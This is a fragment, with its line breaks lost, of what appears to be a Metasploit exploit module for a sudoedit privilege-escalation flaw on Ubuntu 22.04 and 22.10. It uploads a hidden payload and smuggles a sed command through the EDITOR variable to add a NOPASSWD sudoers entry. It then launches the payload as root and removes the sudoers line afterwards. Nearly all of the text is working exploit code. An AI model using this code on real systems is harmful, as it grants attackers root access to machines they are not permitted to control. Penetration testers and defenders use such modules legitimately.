# Check the app is installed and the version    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:distro] == 'ubuntu'    fail_with(Failure::NoTarget, 'Only Ubuntu 22.04 and 22.10 are exploitable by this module') unless sys_info[:version].include?('22.04') || sys_info[:version].include?('22.10')    # Upload payload executable    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    upload_and_chmodx payload_path, generate_payload_exe    register_file_for_cleanup(payload_path)    @flag = Rex::Text.rand_text_alphanumeric(12)    print_status 'Adding user to sudoers'    # we tack on a flag so we can easily grep for this line and clean it up later    command = "EDITOR=\"sed -i -e '$ a `whoami` ALL=(ALL:ALL) NOPASSWD: #{datastore['SHELL']} \# #{@flag}' -- /etc/sudoers\" sudo -S -e #{get_editable_file}"    vprint_status("Executing command: #{command}")    output = cmd_exec command, nil, timeout    if output.include? '/etc/sudoers unchanged'      fail_with(Failure::NoTarget, 'Failed to edit sudoers, command was unsuccessful')    end    if output.include? 'sudo: ignoring editor'      fail_with(Failure::NotVulnerable, 'sudo is patched')    end    output.each_line { |line| vprint_status line.chomp }    print_status('Spawning payload')    # -S may not be needed here, but if exploitation didn't go well, we dont want to bork our shell    # also, attempting to thread off of sudo was problematic, solution was    # https://askubuntu.com/questions/1110865/how-can-i-run-detached-command-with-sudo-over-ssh    # other refs that didn't work: https://askubuntu.com/questions/634620/when-using-and-sudo-on-the-first-command-is-the-second-command-run-as-sudo-t    output = cmd_exec "sudo -S -b sh -c 'nohup #{payload_path} > /dev/null 2>&1 &'", nil, timeout    output.each_line { |line| vprint_status line.chomp }  end  def on_new_session(session)    if @flag      session.shell_command_token("sed -i '/\# #{@flag}/d' /etc/sudoers")      flag_found = session.shell_command_token("grep '#{@flag}' /etc/sudoers")      if flag_found.include? @flag        print_bad("Manual cleanup is required, please run: sed -i '/\# #{@flag}/d' /etc/sudoers")      end    end    super  endend

Tag

#debian